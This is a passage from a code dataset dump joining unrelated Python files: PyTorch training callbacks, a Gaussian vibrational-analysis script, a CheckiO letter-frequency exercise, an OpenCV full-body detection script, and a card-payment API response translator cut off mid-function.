      print('Epoch %05d: completed stopping' % (self.stopped_epoch + 1))\n\n@gin.configurable\nclass LRSchedule(Callback):\n    def __init__(self, base_lr, schedule):\n        self.schedule = schedule\n        self.base_lr = base_lr\n        super(LRSchedule, self).__init__()\n\n    def on_epoch_begin(self, epoch, logs):\n        # Epochs start from 0\n        for e, v in self.schedule:\n            if epoch < e:\n                break\n        for group in self.optimizer.param_groups:\n            group['lr'] = v * self.base_lr\n        logger.info(\"Fix learning rate to {}\".format(v * self.base_lr))\n\n@gin.configurable\nclass ReduceLROnPlateau_PyTorch(Callback):\n    def __init__(self, metric):\n        self.metric = metric\n\n    def on_train_begin(self, logs):\n        self.scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(\n            self.optimizer, mode='min', factor=0.3, patience=5, verbose=True,\n            threshold=0.001, threshold_mode='rel', cooldown=0, min_lr=1e-4, eps=1e-08)\n\n    def on_epoch_end(self, epoch, logs):\n        '''Check for end of current cycle, apply restarts when necessary.'''\n        self.scheduler.step(logs[self.metric])\n\n@gin.configurable\nclass ReduceLROnPlateau(Callback):\n    def __init__(self, base_lr, factor=0.5, patience=5, threshold=0.1, starting_loss = 0.05, new=False):\n        self.factor=factor\n        self.patience=patience\n        self.threshold=threshold\n        self.base_lr = base_lr\n        self.best_loss = None\n        self.bad_counter = 0\n        self.starting_loss = starting_loss\n        self.new=new\n        self.lowerest = 1e-5 if self.new else 1e-6\n\n        super(ReduceLROnPlateau, self).__init__()\n\n    def on_batch_end(self, batch, logs):\n        if self.best_loss is None:\n            self.best_loss = logs['loss']\n        # track the best loss; count a bad batch when loss exceeds best by the threshold margin\n        if logs['loss']<self.best_loss:\n            self.best_loss = logs['loss']\n            self.bad_counter = 0\n        elif(logs['loss']>self.threshold*self.best_loss + self.best_loss):\n            if (logs['loss']>self.starting_loss) and self.new:\n                pass\n            else:\n                self.bad_counter +=1\n        else:\n            pass\n\n        if self.bad_counter>self.patience and self.base_lr>self.lowerest and logs['loss']<self.starting_loss:\n            self.base_lr = self.base_lr*self.factor\n            self.bad_counter = 0\n\n        for group in self.optimizer.param_groups:\n            if group['lr']>self.base_lr:\n                group['lr'] = self.base_lr\n\n        logger.info(\"Fix learning rate to {}\".format( self.base_lr))\n\n@gin.configurable\nclass CycleScheduler(Callback):\n\n    def __init__(self,\n                 starting_condition_epoch = 100,\n                 starting_condition_loss = 0.1,\n                 factor = 0.3,\n                 step_size = 59,\n                 ):\n\n        self.starting_condition_epoch = starting_condition_epoch\n        self.starting_condition_loss = starting_condition_loss\n        self.factor = factor\n        self.start_flag = False\n        self.step_size = step_size\n\n    def on_train_begin(self, logs):\n        for group in self.optimizer.param_groups:\n            self.base_lr = group['lr']\n            break\n\n    def on_epoch_begin(self, epoch, logs):\n        self.step_counter = 0\n\n    def on_batch_begin(self, batch, logs):\n        if self.start_flag:\n            self.step_counter +=1\n            if self.step_counter<=self.step_size:\n                lr = (self.max_lr - self.min_lr)/self.step_size * self.step_counter + self.min_lr\n            else:\n                lr = self.max_lr - (self.max_lr - self.min_lr)/(self.step_counter - self.step_size ) * self.step_counter\n\n            if self.step_counter>2*self.step_size:\n                self.step_counter = 0\n\n            for group in self.optimizer.param_groups:\n                group['lr'] = lr\n            logger.info(\"Fix learning rate to {}\".format(lr))\n\n    def on_epoch_end(self, epoch, logs):\n        '''Check for end of current cycle, apply restarts when necessary.'''\n        if epoch>self.starting_condition_epoch and logs['loss']>self.starting_condition_loss and not self.start_flag:\n            self.min_lr = (1-self.factor)*self.base_lr\n            self.max_lr = self.base_lr*(1+self.factor)\n\n            self.start_flag = True\n            self.step_counter = 0\n\nclass History(Callback):\n    \"\"\"\n    History callback.\n\n    By default saves history every epoch, can be configured to save also every k examples\n    \"\"\"\n    def __init__(self, save_every_k_examples=-1, mode='train'):\n        self.examples_seen = 0\n        self.save_every_k_examples = save_every_k_examples\n        self.examples_seen_since_last_population = 0\n        self.mode = mode\n        super(History, self).__init__()\n\n    def on_train_begin(self, logs=None):\n        # self.epoch = []\n        self.history = {}\n        self.history_batch = {}\n\n    def on_epoch_end(self, epoch, logs=None):\n        logs = logs or {}\n        # self.epoch.append(epoch)\n        for k, v in logs.items():\n            self.history.setdefault(k, []).append(v)\n\n            # if k.endswith(\"nih_labels\"):# and (k not in self.history):\n            #     # we don't need to save nih_labels every epoch.\n            #     #self.history[k] = v\n            #     pass\n            # else:\n            #     self.history.setdefault(k, []).append(v)\n\n        if self.save_path is not None:\n            base_filename = 'history.pkl' if self.mode == 'train' else 'eval_history.pkl'\n            pickle.dump(self.history, open(os.path.join(self.save_path, base_filename), \"wb\"))\n            if self.save_every_k_examples != -1:\n                pickle.dump(self.history_batch, open(os.path.join(self.save_path, \"history_batch.pkl\"), \"wb\"))\n\n    def on_batch_end(self, batch, logs=None):\n        # Batches start from 1\n        if self.save_every_k_examples != -1:\n            if getattr(self.model, \"history_batch\", None) is None:\n                setattr(self.model, \"history_batch\", self)\n            assert \"size\" in logs\n            self.examples_seen += logs['size']\n            logs['examples_seen'] = self.examples_seen\n            self.examples_seen_since_last_population += logs['size']\n\n            if self.examples_seen_since_last_population > self.save_every_k_examples:\n                for k, v in logs.items():\n                    self.history_batch.setdefault(k, []).append(v)\n                self.examples_seen_since_last_population = 
0\n\n\nclass ModelCheckpoint(Callback):\n def __init__(self, filepath, monitor='val_loss', verbose=0,\n save_best_only=False,\n mode='auto', period=1):\n super(ModelCheckpoint, self).__init__()\n self.monitor = monitor\n self.verbose = verbose\n self.filepath = filepath\n self.save_best_only = save_best_only\n self.period = period\n self.epochs_since_last_save = 0\n\n if mode not in ['auto', 'min', 'max']:\n mode = 'auto'\n\n if mode == 'min':\n self.monitor_op = np.less\n self.best = np.Inf\n elif mode == 'max':\n self.monitor_op = np.greater\n self.best = -np.Inf\n else:\n if 'acc' in self.monitor or self.monitor.startswith('fmeasure'):\n self.monitor_op = np.greater\n self.best = -np.Inf\n else:\n self.monitor_op = np.less\n self.best = np.Inf\n\n def __getstate__(self):\n state = self.__dict__.copy()\n del state['model']\n del state['optimizer']\n return state\n\n def __setstate__(self, newstate):\n newstate['model'] = self.model\n newstate['optimizer'] = self.optimizer\n self.__dict__.update(newstate)\n\n def on_epoch_end(self, epoch, logs=None):\n logs = logs or {}\n self.epochs_since_last_save += 1\n if self.epochs_since_last_save >= self.period:\n self.epochs_since_last_save = 0\n if self.save_best_only:\n current = logs.get(self.monitor)\n if current is None:\n logging.warning('Can save best model only with %s available, '\n 'skipping.' % (self.monitor), RuntimeWarning)\n else:\n if self.monitor_op(current, self.best):\n if self.verbose > 0:\n print('Epoch %05d: %s improved from %0.5f to %0.5f,'\n ' saving model to %s'\n % (epoch, self.monitor, self.best,\n current, self.filepath))\n self.best = current\n save_weights(self.model, self.optimizer, self.filepath)\n else:\n if self.verbose > 0:\n print('Epoch %05d: %s did not improve' %\n (epoch, self.monitor))\n else:\n if self.verbose > 0:\n print('Epoch %05d: saving model to %s' % (epoch, self.filepath))\n save_weights(self.model, self.optimizer, self.filepath)\n\n\nclass LambdaCallback(Callback):\n def __init__(self,\n on_epoch_begin=None,\n on_epoch_end=None,\n on_batch_begin=None,\n on_batch_end=None,\n on_train_begin=None,\n on_train_end=None):\n super(LambdaCallback, self).__init__()\n if on_epoch_begin is not None:\n self.on_epoch_begin = on_epoch_begin\n else:\n self.on_epoch_begin = lambda epoch, logs: None\n if on_epoch_end is not None:\n self.on_epoch_end = on_epoch_end\n else:\n self.on_epoch_end = lambda epoch, logs: None\n if on_batch_begin is not None:\n self.on_batch_begin = on_batch_begin\n else:\n self.on_batch_begin = lambda batch, logs: None\n if on_batch_end is not None:\n self.on_batch_end = on_batch_end\n else:\n self.on_batch_end = lambda batch, logs: None\n if on_train_begin is not None:\n self.on_train_begin = on_train_begin\n else:\n self.on_train_begin = lambda logs: None\n if on_train_end is not None:\n self.on_train_end = on_train_end\n else:\n self.on_train_end = lambda logs: None\n\n\nclass LambdaCallbackPickableEveryKExamples(LambdaCallback):\n \"\"\"\n Runs lambda every K examples.\n\n Note: Assumes 'size' key in batch logs denoting size of the current minibatch\n \"\"\"\n def __init__(self,\n on_k_examples=None,\n k=45000,\n call_after_first_batch=False,\n **kwargs):\n super(LambdaCallback, self).__init__()\n self.__dict__.update(kwargs)\n self.examples_seen = 0\n self.call_after_first_batch = call_after_first_batch\n self.examples_seen_since_last_call = 0\n self.k = k\n self.on_k_examples = on_k_examples\n self.calls = 0\n\n def on_batch_end(self, batch, logs=None):\n # Batches starts from 1\n 
assert \"size\" in logs\n self.examples_seen += logs['size']\n self.examples_seen_since_last_call += logs['size']\n\n if (self.call_after_first_batch and batch == 1) \\\n or self.examples_seen_since_last_call > self.k:\n logger.info(\"Batch \" + str(batch))\n logger.info(\"Firing on K examples, ex seen = \" + str(self.examples_seen))\n logger.info(\"Firing on K examples, ex seen last call = \" + str(self.examples_seen_since_last_call))\n self.on_k_examples(logs) # self.calls, self.examples_seen,\n self.examples_seen_since_last_call = 0\n self.calls += 1\n\n def __getstate__(self):\n state = self.__dict__.copy()\n del state['on_k_examples']\n return state\n\n\nclass DumpTensorboardSummaries(Callback):\n def __init__(self):\n super(DumpTensorboardSummaries, self).__init__()\n\n @property\n def file_writer(self):\n if not hasattr(self, '_file_writer'):\n self._file_writer = tensorflow.compat.v1.summary.FileWriter(\n self.save_path, flush_secs=10.)\n return self._file_writer\n\n def on_epoch_end(self, epoch, logs=None):\n summary = tensorflow.compat.v1.Summary()\n for key, value in logs.items():\n try:\n float_value = float(value)\n value = summary.value.add()\n value.tag = key\n value.simple_value = float_value\n except:\n pass\n self.file_writer.add_summary(\n summary, epoch)\n\n@gin.configurable\nclass EvaluateEpoch(Callback):\n def __init__(self, metrics):\n '''\n '''\n super(EvaluateEpoch, self).__init__()\n self.metrics = metrics\n self.metric_func_dict = {'acc': acc_chexnet_covid_numpy, 'auc': auc_chexnet_covid}\n \n def on_epoch_end(self, epoch, logs=None):\n '''appending to log in callback'''\n \n if 'train_predictions' in logs:\n train_preds = logs['train_predictions']\n train_labels = logs['train_labels']\n if 'val_predictions' in logs:\n val_preds = logs['val_predictions']\n val_labels = logs['val_labels']\n if 'test_predictions' in logs:\n test_preds = logs['test_predictions']\n test_labels = logs['test_labels']\n\n for metric in self.metrics:\n \n func = metric.split('_')[0]\n\n if 'train_predictions' in logs:\n logs['{}'.format(metric)] = self.metric_func_dict[func](train_preds, train_labels)\n\n if 'val_predictions' in logs:\n logs['val_{}'.format(metric)] = self.metric_func_dict[func](val_preds, val_labels) \n \n if 'test_predictions' in logs:\n logs['test_{}'.format(metric)] = self.metric_func_dict[func](test_preds, test_labels) \n \n\n@gin.configurable\nclass MetaSaver(Callback):\n def __init__(self):\n super(MetaSaver, self).__init__()\n\n def on_train_begin(self, logs=None):\n logger.info(\"Saving meta data information from the beginning of training\")\n\n assert os.system(\"cp {} {}\".format(sys.argv[0], self.save_path)) == 0, \"Failed to execute cp of source script\"\n\n utc_date = datetime.datetime.utcnow().strftime(\"%Y_%m_%d\")\n\n time_start = time.time()\n cmd = \"python \" + \" \".join(sys.argv)\n self.meta = {\"cmd\": cmd,\n \"save_path\": self.save_path,\n \"most_recent_train_start_date\": utc_date,\n \"execution_time\": -time_start}\n\n json.dump(self.meta, open(os.path.join(self.save_path, \"meta.json\"), \"w\"), indent=4)\n\n # Copy gin configs used, for reference, to the save folder\n os.system(\"rm \" + os.path.join(self.save_path, \"*gin\"))\n for gin_config in sys.argv[2].split(\";\"):\n os.system(\"cp {} {}\".format(gin_config, self.save_path))\n\n def on_train_end(self, logs=None):\n self.meta['execution_time'] += time.time()\n json.dump(self.meta, open(os.path.join(self.save_path, \"meta.json\"), \"w\"), indent=4)\n os.system(\"touch \" + 
os.path.join(self.save_path, \"FINISHED\"))\n\n@gin.configurable\nclass BreastDataLoader(Callback):\n def __init__(self, \n mode=\"multiclass_cancer_sides\",\n ):\n #self.view_weights = view_weights\n \n super(BreastDataLoader, self).__init__()\n self.mode = mode\n\n def on_train_epoch_begin(self, epoch, logs):\n current_random_seed = self.data.seed_shifter.get_seed(phase='training', epoch_number=epoch)\n self.data.start_training_epoch(random_seed=current_random_seed, mode=self.mode)\n\n def on_val_epoch_begin(self, epoch, logs):\n current_random_seed = self.data.seed_shifter.get_seed(phase='validation', epoch_number=epoch)\n self.data.start_validation_epoch(random_seed=current_random_seed, mode=self.mode)\n\n def on_test_epoch_begin(self, epoch, logs):\n current_random_seed = self.data.seed_shifter.get_seed(phase='test', epoch_number=epoch)\n self.data.start_test_epoch(random_seed=current_random_seed, mode=self.mode)\n","sub_path":"src/callbacks/callbacks.py","file_name":"callbacks.py","file_ext":"py","file_size_in_byte":28963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"562988458","text":"import glob as glob\r\nimport os\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport Analysis1D as Analysis1\r\nimport Analysis2D as Analysis2\r\nimport VAAcompplots as Comp\r\nfrom GaussianHandler import LogInterpreter\r\n\r\n\r\ndef run_1d_harmonic_analysis(elect_pot):\r\n \"\"\"runs script to complete HARMONIC analysis by NORMAL MODE of 1D scan data\r\n :arg elect_pot: dat file of electronic potential from relaxed scan\r\n :returns harm1d_0: PES of OH=0 for NM method\r\n :returns harm1d_1: PES of OH=1 for NM method\"\"\"\r\n freq_dir = os.path.join(main_dir, 'Roo Freqs')\r\n freq_list = sorted(glob.glob(os.path.join(freq_dir, 'chks', 'partrig_RooFreq_*.fchk')))\r\n numcoord = 39 # tetramer\r\n mass = (np.array(\r\n (15.999, 15.999, 1.008, 2.014, 2.014, 15.999, 2.014, 2.014, 15.999, 2.014, 2.014, 2.014, 2.014)\r\n )/0.00054858) # tetramer\r\n norm_modes = Analysis1.run_norm_mode(freq_list, numcoord, mass)\r\n np.savetxt(os.path.join(freq_dir, 'Roo_partrig_normalmodes.dat'), norm_modes)\r\n\r\n harm1d_0, harm1d_1 = Analysis1.plt_harm(norm_modes, elect_pot)\r\n plt.savefig(os.path.join(main_dir, 'figures', 'HbNM_1D_partrig_ohcurves.png'))\r\n np.savetxt(os.path.join(main_dir, 'VAA', 'HbNM_1D_partrig_OH=0.dat'), harm1d_0)\r\n np.savetxt(os.path.join(main_dir, 'VAA', 'HbNM_1D_partrig_OH=1.dat'), harm1d_1)\r\n return harm1d_0, harm1d_1\r\n\r\n\r\ndef run_2d_harmonic_analysis(mini_pot):\r\n \"\"\"runs script to complete HARMONIC analysis by FINITE DIFFERENCE of 2D scan data.\r\n :arg mini_pot: dat file of electronic potential from 2D relaxed scan\r\n :returns harm2d_0: PES of OH=0 for FD method\r\n :returns harm2d_1: PES of OH=1 for FD method\"\"\"\r\n FD_dir = os.path.join(main_dir, 'VAA', 'harmonic data', 'finite data')\r\n FD_scans = sorted(glob.glob(os.path.join(FD_dir, 'Egraph_partrig*.dat')))\r\n freqs = Analysis2.do_ALL_the_freqy_science(FD_scans)\r\n np.savetxt(os.path.join(main_dir, 'VAA', 'HbFD_2D_partrig_freqs.dat'), freqs)\r\n\r\n harm2d_0, harm2d_1 = Analysis2.make_the_plot(freqs, mini_pot)\r\n np.savetxt(os.path.join(main_dir, 'VAA', 'HbFD_2D_partrig_OH=0.dat'), harm2d_0)\r\n np.savetxt(os.path.join(main_dir, 'VAA', 'HbFD_2D_partrig_OH=1.dat'), harm2d_1)\r\n plt.savefig(os.path.join(main_dir, 'figures', 'HbFD_2D_partrig_ohcurves.png'))\r\n plt.close()\r\n return harm2d_0, harm2d_1\r\n\r\n\r\ndef 
run_2d_anharmonic_analysis(cut_dict, mini_pot):\r\n \"\"\"runs script to complete ANHARMONIC analysis by DISCRETE VARIABLE REPRESENTATION of 2D scan data.\r\n :arg mini_pot: dat file of electronic potential from 2D relaxed scan\r\n :returns anharm_0: PES of OH=0 for DVR method\r\n :returns anharm_1: PES of OH=1 for DVR method\"\"\"\r\n energy_array, wfn_array = Analysis2.run_dvr(cut_dict, 4, plots=True, save=True)\r\n\r\n anharm_0, anharm_1 = Analysis2.make_the_other_plot(energy_array, mini_pot)\r\n np.savetxt(os.path.join(main_dir, 'VAA', 'AbDVR_2D_partrig_OH=0.dat'), anharm_0)\r\n np.savetxt(os.path.join(main_dir, 'VAA', 'AbDVR_2D_partrig_OH=1.dat'), anharm_1)\r\n plt.savefig(os.path.join(main_dir, 'figures', 'AbDVR_2D_partrig_ohcurves.png'))\r\n plt.close()\r\n return anharm_0, anharm_1\r\n\r\n\r\ndef run_comp_plots(mini_pot, harm1d_0, harm1d_1, harm2d_0, harm2d_1, anharm_0, anharm_1):\r\n \"\"\"runs script to compare VAA results using above methods.\r\n :arg mini_pot: Minimum energy through 2D plot (x=Roo (ang) y=Energy (hartrees))\r\n :arg harm1d_0: PES of OH=0 for NM method\r\n :arg harm1d_1: PES of OH=1 for NM method\r\n :arg harm2d_0: PES of OH=0 for FD method\r\n :arg harm2d_1: PES of OH=1 for FD method\r\n :arg anharm_0: PES of OH=0 for DVR method\r\n :arg anharm_1: PES of OH=1 for DVR method\"\"\"\r\n Comp.plot_comparison_2d(harm2d_0, harm2d_1, anharm_0, anharm_1, mini_pot)\r\n plt.savefig(os.path.join(main_dir, 'figures', '2D_partrig_VAA_energycurves.png'))\r\n plt.close()\r\n\r\n Comp.plot_diffs(harm1d_0, harm1d_1, anharm_0, anharm_1, harm2d_0, harm2d_1)\r\n plt.savefig(os.path.join(main_dir, 'figures', 'E0E1_partrig_differenceplot.png'))\r\n plt.close()\r\n\r\n\r\nif __name__ == '__main__':\r\n main_dir = os.path.dirname(os.path.dirname(__file__))\r\n elect_pot = np.loadtxt(os.path.join(main_dir, '1D Scans', '1D_partrig_electpot.dat'))\r\n harm1d_0, harm1d_1 = run_1d_harmonic_analysis(elect_pot)\r\n\r\n scan_dir = os.path.join(main_dir, '2D Scans')\r\n all_scans = list(sorted(glob.glob(os.path.join(scan_dir, \"2Dtet_partrig*.log\"))))\r\n cut_dict = LogInterpreter(*all_scans).cut_dictionary(midpoint=True)\r\n mini_pot = LogInterpreter(*all_scans).minimum_pot()\r\n harm2d_0, harm2d_1 = run_2d_harmonic_analysis(mini_pot)\r\n anharm_0, anharm_1 = run_2d_anharmonic_analysis(mini_pot)\r\n run_comp_plots(mini_pot, harm1d_0, harm1d_1, harm2d_0, harm2d_1, anharm_0, anharm_1)\r\n\r\n","sub_path":"dovaathings.py","file_name":"dovaathings.py","file_ext":"py","file_size_in_byte":4857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"376189916","text":"\"\"\"\nInput: A text for analysis as a string.\nOutput: The most frequent letter in lower case as a string.\n\"\"\"\n\ndef checkio(text):\n # raw string process, transfer to lower case and remove spaces\n text = text.lower().replace(\" \", \"\")\n\n # raw string process 2, create a list, sort and add an empty string at the end.\n text_list = [i for i in text if ord(i) in range(97, 123)]\n text_list = sorted(text_list)\n text_list.append(\"\")\n\n # create an empty dict and a loop to add data to the dict\n text_dict = {}\n index = len(text_list)\n occurrence = 1\n for i in range(0, index - 1):\n if text_list[i] == text_list[i + 1]:\n occurrence += 1\n else:\n text_dict[text_list[i]] = occurrence\n occurrence = 1\n\n # generate a list that stores all the values\n occurrence_max = max(list(text_dict.values()))\n for keys in text_dict.keys():\n if text_dict[keys] == occurrence_max:\n 
break\n    return keys\n\n# another method\nimport string\n\ndef checkio(text):\n    \"\"\"\n    We iterate through the Latin alphabet and count each letter in the text.\n    Then \"max\" selects the most frequent letter.\n    For the case when we have several equal letters,\n    \"max\" selects the first of them.\n    \"\"\"\n    text = text.lower()\n    return max(string.ascii_lowercase, key=text.count)\n\ndef checkio(text):\n    import string\n    text = \"\".join(sorted(list(filter(lambda x: x in string.ascii_lowercase, text.lower()))))\n    for i in text:\n        if text.count(i) == max(map(text.count, string.ascii_lowercase)):\n            return i\n\nif __name__ == \"__main__\":\n    #These \"asserts\" are used only for self-checking and are not necessary for auto-testing\n    assert checkio(\"Hello World!\") == \"l\", \"Hello test\"\n    assert checkio(\"How do you do?\") == \"o\", \"O is most wanted\"\n    assert checkio(\"One\") == \"e\", \"All letter only once.\"\n    assert checkio(\"Oops!\") == \"o\", \"Don't forget about lower case.\"\n    assert checkio(\"AAaooo!!!!\") == \"a\", \"Only letters.\"\n    assert checkio(\"abe\") == \"a\", \"The First.\"\n    assert checkio(\"a\" * 9000 + \"b\" * 1000) == \"a\", \"Long.\"\n    print(\"The local tests are done.\")\n","sub_path":"AlgorithmTraining/Checkio/home/p1_the_most_wanted_letter.py","file_name":"p1_the_most_wanted_letter.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"20303420","text":"from matplotlib import pyplot as plt\nimport skimage.io as imageio\nimport pandas as pd\nimport numpy as np\nimport cv2\n\nfullbody = cv2.CascadeClassifier(\"/home/lenovo/Documents/haarcascades/haarcascade_fullbody.xml\")\n\nimage = cv2.imread(\"i.jpeg\")\n\ngray=cv2.cvtColor(image,cv2.COLOR_BGR2RGB)\nimageio.imshow(gray)\n\nforehead=fullbody.detectMultiScale(gray, 1.2, 3)\nprint(forehead)\n\ngozler=[]\nfor (x,y,w,h) in forehead:\n    gozler.append(gray[y:y+h, x:x+w])\nimageio.imshow(gozler[0])\n# imageio.imshow(gozler[1])\n\nfor gz in gozler:\n    plt.imshow(gz)\n    plt.show() \n    pd.DataFrame({'fullbody':str(gozler[0]), 'forehead':str(gozler[1])},index=[0,1]).to_csv('fullbodydata.csv')","sub_path":"Feature_Extration-Harcascasde/fullbody.py","file_name":"fullbody.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"433921424","text":"import hashlib\nimport copy\n\nfrom django.conf import settings\n\nfrom carddirector.cd_api import fis\nfrom carddirector.cd_api.constants import tps_response_codes, result_keys, message_types, response_codes\nfrom carddirector.cd_api.constants.response_codes import INFO_REQUEST_IS_BEING_PROCESSED, ERROR_ISSUING, INFO_TPS, ERROR_INSUFFICIENT_BALANCE, ERROR_TPS, INFO_REF, INFO_OPERATION_COMPLETED, INFO_CARD_BALANCE_SUCCESS, INFO_CARD_LOAD_SUCCESS, INFO_CARD_UNLOAD_SUCCESS\nfrom carddirector.cd_api.constants.result_keys import RESULT_CURRENCY, RESULT_CARD_ACCOUNT_BALANCE\nfrom carddirector.cd_api.constants.status_codes import STATUS_SUCCESS, STATUS_FAIL, STATUS_PROCESSING\nfrom carddirector.cd_utils import string_utils\nfrom carddirector.cd_utils.date_utils import get_now\nfrom carddirector.cd_utils.string_utils import format_in_cents\nfrom carddirector.tps_account.repos import find_card_holder_by_card_id\nfrom carddirector.tps_txn.repos import find_cd_transaction_by_acq_txn_no\nfrom carddirector.cd_api.messages.CardDirectorRequest_pb2 import CardDirectorRequest\n\n\ndef get_message_from_response(tps_response, 
response_code, default_value=\"\"):\n for response_entry in tps_response.responseEntries:\n if response_entry.responseCode == response_code:\n return response_entry.responseMessage\n return default_value\n\n\ndef add_response(tps_response, code, message):\n response_entry = tps_response.responseEntries.add()\n response_entry.responseCode = code\n response_entry.responseMessage = message\n\n\ndef fill_cd_response_header_fields(protobuf_response):\n header = protobuf_response.header\n header.messageId = generate_message_id()\n header.signatureAlgorithm = \"SHA256\"\n header.timestamp = get_current_timestamp()\n\n\ndef generate_message_id():\n return string_utils.random_string(16)\n\n\ndef get_current_timestamp():\n from carddirector.cd_utils import date_utils\n\n return date_utils.get_utcnow_with_isoformat()\n\n\ndef _add_response(protobuf_response, code, message=\"N/A\"):\n response_add = protobuf_response.responses.add()\n response_add.responseCode = code\n response_add.responseMessage = message\n\n\ndef _update_response_status_code(protobuf_response, tps_response):\n if tps_response.success:\n _set_status_code_success(protobuf_response)\n else:\n from carddirector.tps_protobuf import utils\n\n is_mq_timeout_response = utils.is_mq_timeout_tps_response(tps_response)\n if is_mq_timeout_response:\n _set_status_code_processing(protobuf_response)\n else:\n _set_status_code_fail(protobuf_response)\n\n\ndef translate_tps_response(message_type, cd_response, tps_response):\n from carddirector.tps_protobuf import utils\n\n is_mq_timeout_response = utils.is_mq_timeout_tps_response(tps_response)\n if is_mq_timeout_response:\n _add_response(cd_response, INFO_REQUEST_IS_BEING_PROCESSED, \"Request is being processed. Please wait for callback or do Response Result Enquiry after a while.\")\n else:\n for tps_response_entry in tps_response.responseEntries:\n if tps_response_entry.responseCode == tps_response_codes.ERROR_FIS:\n _add_response(cd_response, ERROR_ISSUING,\n \"%s - %s\" % (\"Issuing System Error\", tps_response_entry.responseMessage))\n elif tps_response_entry.responseCode == tps_response_codes.INFO_FIS_ACTION_CODE:\n fis_action_code = tps_response_entry.responseMessage\n fis_message = fis.FIS_ACTION_CODES[fis_action_code]\n _add_response(cd_response, INFO_TPS,\n \"%s - %s: %s\" % (\"Issuing System Response\", fis_action_code, fis_message))\n elif tps_response_entry.responseCode == tps_response_codes.ERROR_INSUFFICIENT_BALANCE:\n _add_response(cd_response, ERROR_INSUFFICIENT_BALANCE,\n \"%s - %s\" % (tps_response_entry.responseCode, tps_response_entry.responseMessage))\n elif tps_response_entry.responseCode.startswith(tps_response_codes.ERROR_PREFIX):\n _add_response(cd_response, ERROR_TPS,\n \"%s - %s\" % (tps_response_entry.responseCode, tps_response_entry.responseMessage))\n elif tps_response_entry.responseCode.startswith(tps_response_codes.INFO_CD_CARD_ID):\n continue\n elif tps_response_entry.responseCode.startswith(tps_response_codes.INFO_CD_CUSTOMER_CARD_ID):\n continue\n elif tps_response_entry.responseCode.startswith(tps_response_codes.INFO_PREFIX):\n _add_response(cd_response, INFO_TPS,\n \"%s - %s\" % (tps_response_entry.responseCode, tps_response_entry.responseMessage))\n else:\n _add_response(cd_response, INFO_REF,\n \"%s - %s\" % (tps_response_entry.responseCode, tps_response_entry.responseMessage))\n\n _update_response_status_code(cd_response, tps_response)\n\n if message_types.CARD_ACCOUNT_BALANCE == message_type:\n translate_card_account_balance_response(cd_response, 
tps_response)\n elif message_types.CARD_LOAD == message_type:\n translate_card_load_response(cd_response, tps_response)\n elif message_types.CARD_UNLOAD == message_type:\n translate_card_unload_response(cd_response, tps_response)\n elif message_types.CARD_STATUS_ENQUIRY == message_type:\n translate_card_status_enquiry_response(cd_response, tps_response)\n elif message_types.ACQUIRING_PURCHASE == message_type:\n translate_acquiring_purchase_response(cd_response,tps_response)\n elif message_types.ACQUIRING_REFUND == message_type:\n translate_acquiring_refund_response(cd_response,tps_response)\n return cd_response\n\n\ndef translate_card_account_balance_response(protobuf_response, tps_response):\n _update_card_id_mapping_to_response(protobuf_response, tps_response)\n\n currency_list = [response_entry.responseMessage for response_entry in tps_response.responseEntries if\n response_entry.responseCode == tps_response_codes.INFO_CD_CARD_CURR_CODE]\n balance_list = [response_entry.responseMessage for response_entry in tps_response.responseEntries if\n response_entry.responseCode == tps_response_codes.INFO_CD_CARD_AVL_BALANCE]\n if len(currency_list) > 0: _add_result(protobuf_response, RESULT_CURRENCY, currency_list[0])\n if len(balance_list) > 0: _add_result(protobuf_response, RESULT_CARD_ACCOUNT_BALANCE,\n format_in_cents(balance_list[0]))\n if tps_response.success:\n _add_response(protobuf_response, INFO_OPERATION_COMPLETED)\n _add_response(protobuf_response, INFO_CARD_BALANCE_SUCCESS)\n\n\ndef translate_card_load_response(protobuf_response, tps_response):\n if tps_response.success:\n _add_response(protobuf_response, INFO_OPERATION_COMPLETED)\n _add_response(protobuf_response, INFO_CARD_LOAD_SUCCESS)\n\n\ndef translate_card_unload_response(protobuf_response, tps_response):\n if tps_response.success:\n _add_response(protobuf_response, INFO_OPERATION_COMPLETED)\n _add_response(protobuf_response, INFO_CARD_UNLOAD_SUCCESS)\n\n\ndef translate_card_status_enquiry_response(protobuf_response, tps_response):\n\n _update_card_id_mapping_to_response(protobuf_response, tps_response)\n\n card_status_code = get_message_from_response(tps_response, tps_response_codes.INFO_CD_CARD_STATUS_CODE, \"\")\n card_expiry_date = get_message_from_response(tps_response, tps_response_codes.INFO_CD_CARD_EXPIRY_DATE, \"\")\n card_curr_code = get_message_from_response(tps_response, tps_response_codes.INFO_CD_CARD_CURR_CODE, \"\")\n card_masked_pan = get_message_from_response(tps_response, tps_response_codes.INFO_CD_CARD_MASKED_PAN, \"\")\n _add_result(protobuf_response, result_keys.RESULT_CARD_STATUS_CODE, card_status_code)\n _add_result(protobuf_response, result_keys.RESULT_CARD_EXPIRY_DATE, card_expiry_date)\n _add_result(protobuf_response, result_keys.RESULT_CARD_CURR_CODE, card_curr_code)\n _add_result(protobuf_response, result_keys.RESULT_CARD_MASKED_PAN, card_masked_pan)\n if tps_response.success:\n _add_response(protobuf_response, INFO_OPERATION_COMPLETED)\n _add_response(protobuf_response, INFO_CARD_BALANCE_SUCCESS)\n\ndef translate_acquiring_purchase_response(protobuf_response, tps_response):\n if tps_response.success:\n acq_transaction_number = get_message_from_response(tps_response, tps_response_codes.INFO_CD_ACQ_TRANSACTION_NUMBER, \"\")\n _update_acquiring_transaction_result(protobuf_response, acq_transaction_number)\n\n _add_response(protobuf_response, INFO_OPERATION_COMPLETED)\n _add_response(protobuf_response, response_codes.INFO_ACQUIRING_PURCHASE_SUCCESS)\n\ndef 
